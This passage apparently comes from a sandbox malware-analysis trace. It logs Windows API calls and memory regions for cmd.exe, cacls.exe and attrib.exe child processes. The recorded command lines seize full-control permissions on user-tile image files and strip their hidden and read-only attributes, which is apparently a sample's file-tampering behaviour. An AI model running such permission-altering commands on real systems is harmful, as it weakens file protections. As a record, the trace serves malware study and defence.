lpProcessInformation=0x2ef318*(hProcess=0x4c, hThread=0x50, dwProcessId=0x310, dwThreadId=0x848)) returned 1 [0190.084] CloseHandle (hObject=0x50) returned 1 [0190.084] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.084] GetEnvironmentStringsW () returned 0x472410* [0190.084] FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.084] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0190.118] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef20c | out: lpExitCode=0x2ef20c*=0x0) returned 1 [0190.118] CloseHandle (hObject=0x4c) returned 1 [0190.118] _vsnwprintf (in: _Buffer=0x2ef354, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef218 | out: _Buffer="00000000") returned 8 [0190.119] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0190.119] GetEnvironmentStringsW () returned 0x472410* [0190.119] FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.119] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0190.119] GetEnvironmentStringsW () returned 0x472410* [0190.119] FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.119] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef270 | out: lpAttributeList=0x2ef270) [0190.119] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.119] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.119] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.119] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.119] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.119] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.119] SetConsoleInputExeNameW () returned 0x1 [0190.119] GetConsoleOutputCP () returned 0x1b5 [0190.119] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.119] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.120] exit (_Code=0) Process: id = "419" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0x248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "418" os_parent_pid = "0x878" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27788 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27789 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27790 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27791 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27792 start_va = 0x3c0000 end_va = 0x3c8fff entry_point = 0x3c0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27793 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27794 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27795 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27796 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27797 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27798 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27799 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27800 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27801 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 27802 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 27803 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27804 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27805 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27806 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27807 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27808 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27809 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 595 os_tid = 0x9cc Thread: id = 596 os_tid = 0xab8 Process: id = "420" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0x310" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "418" os_parent_pid = "0x878" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27810 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27811 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27812 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27813 start_va = 0x130000 end_va = 0x136fff entry_point = 0x130000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27814 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27815 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27816 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27817 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27818 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27819 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27820 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27821 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27822 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27823 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 27824 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 27825 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27826 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27827 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27828 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27829 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27830 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27831 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27832 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27833 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27834 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27835 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27836 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27837 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 27838 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27839 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 597 os_tid = 0x848 Process: id = "421" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x9d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27840 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27841 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27842 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27843 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 27844 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27845 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27846 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27847 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27848 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27849 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27894 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27895 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27896 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27897 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 27898 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 27899 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27900 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27901 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27902 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27903 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27904 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27905 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27906 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27907 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27908 start_va = 0x430000 end_va = 0x4f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 27909 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27910 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27911 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 27912 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 27913 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 27914 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27915 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 27916 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 27917 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 27919 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 598 os_tid = 0x888 [0190.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fa7c | out: lpSystemTimeAsFileTime=0x14fa7c*(dwLowDateTime=0xa6a682c0, dwHighDateTime=0x1d440a9)) [0190.837] GetCurrentProcessId () returned 0x9d4 [0190.837] GetCurrentThreadId () returned 0x888 [0190.837] GetTickCount () returned 0x36566 [0190.837] QueryPerformanceCounter (in: lpPerformanceCount=0x14fa74 | out: lpPerformanceCount=0x14fa74*=24762603046) returned 1 [0190.837] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0190.837] __set_app_type (_Type=0x1) [0190.837] __p__fmode () returned 0x76b331f4 [0190.837] __p__commode () returned 0x76b331fc [0190.838] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0190.838] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0190.838] GetCurrentThreadId () returned 0x888 [0190.838] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x888) returned 0x38 [0190.838] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.838] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0190.838] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.838] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0190.838] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fa0c | out: phkResult=0x14fa0c*=0x0) returned 0x2 [0190.838] VirtualQuery (in: lpAddress=0x14fa43, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.838] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0190.838] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0190.838] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.838] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f9dc, dwLength=0x1c | out: lpBuffer=0x14f9dc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0190.838] GetConsoleOutputCP () returned 0x1b5 [0190.838] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.839] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0190.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.839] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0190.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.839] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.839] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.839] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.839] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.839] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.839] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0190.839] GetEnvironmentStringsW () returned 0x340308* [0190.840] FreeEnvironmentStringsW (penv=0x340308) returned 1 [0190.840] GetEnvironmentStringsW () returned 0x340308* [0190.840] FreeEnvironmentStringsW (penv=0x340308) returned 1 [0190.840] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e97c | out: phkResult=0x14e97c*=0x40) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0xb8, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x1, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0x1, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x0, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x40, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x40, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0x40, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegCloseKey (hKey=0x40) returned 0x0 [0190.840] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e97c | out: phkResult=0x14e97c*=0x40) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0x40, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x1, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0x1, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x0, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, 